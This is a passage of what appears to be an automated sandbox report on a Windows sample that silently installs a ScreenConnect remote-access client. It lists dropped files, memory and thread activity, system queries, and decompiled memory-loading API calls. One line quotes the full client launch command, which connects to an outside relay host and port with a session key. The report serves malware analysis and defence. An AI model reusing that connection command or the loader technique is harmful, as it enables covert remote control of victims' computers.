                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeMemory allocated: 1670000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeMemory allocated: 3150000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeMemory allocated: 5150000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeMemory allocated: 68E0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeMemory allocated: 6070000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeMemory allocated: 78E0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeMemory allocated: 88E0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeMemory allocated: 68E0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeMemory allocated: 8B70000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeMemory allocated: B30000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeMemory allocated: 14F0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeMemory allocated: 13F0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeMemory allocated: 18B0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeMemory allocated: 1B0F0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeMemory allocated: 2270000 memory reserve | memory write watch
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeMemory allocated: 1A340000 memory reserve | memory write watch
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSICFCA.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Client.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\ScreenConnect.Windows.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsAuthenticationPackage.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\ScreenConnect.Core.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSICBF0.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Windows.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIC2F6.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Core.dllJump to dropped file
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exe TID: 7500Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe TID: 7904Thread sleep count: 46 > 30Jump to behavior
                                  Source: C:\Windows\System32\svchost.exe TID: 8092Thread sleep time: -30000s >= -30000sJump to behavior
                                  Source: C:\Windows\System32\svchost.exe TID: 7264Thread sleep time: -30000s >= -30000sJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe TID: 8136Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                                  Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477
                                  Source: ScreenConnect.ClientService.exe, 00000007.00000002.3598453854.0000000004230000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq
                                  Source: svchost.exe, 00000009.00000002.3446108257.000001859C05E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.3445586921.0000018596A2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                  Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeMemory allocated: page read and write | page guardJump to behavior

                                  HIPS / PFW / Operating System Protection Evasion

                                  barindex
                                  .NET source code references suspicious native API functions
                                  Source: 0.0.f53WqfzzNt.exe.14578ec.1.raw.unpack, Program.csReference to suspicious API methods: FindResource(moduleHandle, e.Name, "FILES")
                                  Source: 0.2.f53WqfzzNt.exe.5890000.6.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                                  Source: 0.2.f53WqfzzNt.exe.5890000.6.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                                  Source: 0.2.f53WqfzzNt.exe.5890000.6.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                                  Source: 0.2.f53WqfzzNt.exe.5890000.6.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                                  Source: 0.2.f53WqfzzNt.exe.5890000.6.raw.unpack, WindowsExtensions.csReference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\a532d472f1ff1d4e\ScreenConnect.ClientSetup.msi"Jump to behavior
                                  Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe "c:\program files (x86)\screenconnect client (a532d472f1ff1d4e)\screenconnect.clientservice.exe" "?e=access&y=guest&h=sc.connectprotocol.es&p=8041&s=5b6ef70d-09c3-4123-8987-219271e6483f&k=bgiaaackaabsu0exaagaaaeaaqc1kwkbpg72shug%2fcugwqb7iuebcyny1kcdtceo3n0ry4axiph%2ffmztln0b%2bg2miuqorkgq0xsvxj7wucz%2bdiimwdt7qllgfko33osoqisfilkobrosqmoo0cyg%2fpkva7aaau%2bym8zey9okpyj7knkvh679krkgwwm5tfc%2fbhzztt1d5pfiewfvi67rlcagqxh1hudy%2bbdi6lg6r8m8lqczrbhxazj%2fuvxvugxn6zwttc7e00yjiy6fpwniox5ej%2fn2ux9gcwu%2bpspaixxjhoyehv84bhaut0rgc1re8m9puttx9udji37opbolw%2f5qq735uizmwagufhfj%2flzeryvq&t=golden-team-001"
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1778391029.0000000000E62000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.drBinary or memory string: Progman
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1778391029.0000000000E62000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\ScreenConnect.InstallerActions.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\ScreenConnect.Core.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
